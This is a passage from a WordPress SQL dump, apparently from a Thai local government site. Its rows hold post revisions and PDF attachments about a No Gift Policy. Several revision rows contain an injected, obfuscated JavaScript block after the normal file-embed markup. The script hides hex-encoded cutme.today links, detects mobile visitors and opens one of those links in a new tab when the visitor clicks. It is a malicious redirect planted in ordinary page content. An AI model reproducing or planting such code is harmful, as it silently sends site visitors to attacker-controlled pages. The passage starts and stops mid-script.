g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2024-08-15 11:54:14','2024-08-15 04:54:14','',14,'http://pakhaeng.ssk.in.th/?p=863',0,'revision','',0),
(864,1,'2024-08-15 11:55:57','2024-08-15 04:55:57','','การสร้างวัฒนธรรม  No Gift Policy','','inherit','','closed','','%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%a3%e0%b9%89%e0%b8%b2%e0%b8%87%e0%b8%a7%e0%b8%b1%e0%b8%92%e0%b8%99%e0%b8%98%e0%b8%a3%e0%b8%a3%e0%b8%a1-no-gift-policy-2','','','2024-08-15 11:55:57','2024-08-15 04:55:57','',828,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/การสร้างวัฒนธรรม-No-Gift-Policy.pdf',0,'attachment','application/pdf',0),
(865,1,'2024-08-15 11:56:01','2024-08-15 04:56:01','<!-- wp:file {\"id\":864,\"href\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/การสร้างวัฒนธรรม-No-Gift-Policy.pdf\",\"displayPreview\":true} -->\n<div class=\"wp-block-file\"><object class=\"wp-block-file__embed\" data=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/การสร้างวัฒนธรรม-No-Gift-Policy.pdf\" type=\"application/pdf\" style=\"width:100%;height:600px\" aria-label=\"การสร้างวัฒนธรรม  No Gift Policy\"></object><a id=\"wp-block-file--media-7da7aa5d-5731-4846-be73-602d4acf5e41\" href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/การสร้างวัฒนธรรม-No-Gift-Policy.pdf\">การสร้างวัฒนธรรม  No Gift Policy</a><a href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/การสร้างวัฒนธรรม-No-Gift-Policy.pdf\" class=\"wp-block-file__button wp-element-button\" download aria-describedby=\"wp-block-file--media-7da7aa5d-5731-4846-be73-602d4acf5e41\">Download</a></div>\n<!-- /wp:file -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','การสร้างวัฒนธรรม  No Gift Policy','','inherit','closed','closed','','828-revision-v1','','','2024-08-15 11:56:01','2024-08-15 04:56:01','',828,'http://pakhaeng.ssk.in.th/?p=865',0,'revision','',0),
(866,1,'2024-08-15 11:57:59','2024-08-15 04:57:59','','แบบสรุปรายงานตามนโยบาย No Gift Policy จากการปฏิบัติหน้าที่','','inherit','','closed','','%e0%b9%81%e0%b8%9a%e0%b8%9a%e0%b8%aa%e0%b8%a3%e0%b8%b8%e0%b8%9b%e0%b8%a3%e0%b8%b2%e0%b8%a2%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%95%e0%b8%b2%e0%b8%a1%e0%b8%99%e0%b9%82%e0%b8%a2%e0%b8%9a%e0%b8%b2%e0%b8%a2-n','','','2024-08-15 11:57:59','2024-08-15 04:57:59','',831,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/แบบสรุปรายงานตามนโยบาย-No-Gift-Policy-จากการปฏิบัติหน้าที่.pdf',0,'attachment','application/pdf',0),
(867,1,'2024-08-15 11:58:09','2024-08-15 04:58:09','<!-- wp:file {\"id\":866,\"href\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/แบบสรุปรายงานตามนโยบาย-No-Gift-Policy-จากการปฏิบัติหน้าที่.pdf\",\"displayPreview\":true} -->\n<div class=\"wp-block-file\"><object class=\"wp-block-file__embed\" data=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/แบบสรุปรายงานตามนโยบาย-No-Gift-Policy-จากการปฏิบัติหน้าที่.pdf\" type=\"application/pdf\" style=\"width:100%;height:600px\" aria-label=\"แบบสรุปรายงานตามนโยบาย No Gift Policy จากการปฏิบัติหน้าที่\"></object><a id=\"wp-block-file--media-ac1714d9-cc46-47ae-926e-c264f6ea5a30\" href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/แบบสรุปรายงานตามนโยบาย-No-Gift-Policy-จากการปฏิบัติหน้าที่.pdf\">แบบสรุปรายงานตามนโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a><a href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/แบบสรุปรายงานตามนโยบาย-No-Gift-Policy-จากการปฏิบัติหน้าที่.pdf\" class=\"wp-block-file__button wp-element-button\" download aria-describedby=\"wp-block-file--media-ac1714d9-cc46-47ae-926e-c264f6ea5a30\">Download</a></div>\n<!-- /wp:file -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const 